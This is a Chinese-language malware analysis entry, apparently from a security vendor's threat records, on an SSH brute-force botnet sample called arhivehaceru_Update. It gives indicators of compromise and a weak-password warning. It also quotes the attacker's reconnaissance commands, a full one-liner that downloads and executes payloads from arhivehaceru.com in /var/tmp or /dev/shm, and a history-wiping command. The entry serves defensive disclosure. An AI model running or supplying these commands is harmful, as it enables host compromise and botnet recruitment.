简述

arhivehaceru_Update为botnet样本,下载自arhivehaceru.com域名,感染主机后构建僵尸网络,可发动DDos攻击。

elkeid 样本ID

  • elkeid_20221202_botnet_8

捕获时间

  • 20221202

最近活跃时间

  • 20221202

关键词

./History,arhivehaceru

已知入侵途径

  • 弱口令爆破

涉及样本

执行目录

  • /var/tmp
  • /dev/shm

样本

  • History

    • shell文件,启动脚本
  • Update

    • bot程序

主要行为

  • ssh行为

    • 收集信息

      • bash -c uname -s -v -n -r -m
      • bash -c curl ipinfo.io/org
      • bash -c nproc
    • 下载并赋权执行 "History" -bash -c cd /var/tmp || cd /dev/shm ; mkdir .update-logs ; cd .update-logs ; wget -q arhivehaceru.com/.x/Update || curl -O -s -L arhivehaceru.com/.x/Update ; wget -q arhivehaceru.com/.x/History || curl -O -s -L arhivehaceru.com/.x/History ; chmod +x * ; ./History ;

    • 清除历史记录

      • history -c
  • History行为

    • 执行Update

      • pidof Update
      • ./Update
  • Update

    • bot程序,暂无捕获行为

IOC

URLsha256
arhivehaceru.com/.x/HistoryHistory:e9bbe9aecfaea4c738d95d0329a5da9bd33c04a97779172c7df517e1a808489c
arhivehaceru.com/.x/UpdateUpdate:0037cc30be8824b8d5c1576d6a93342de063778ee210d3127de6c3b1173de451

已知情报

安全配置建议

  • 避免使用弱密码或默认密码

参考链接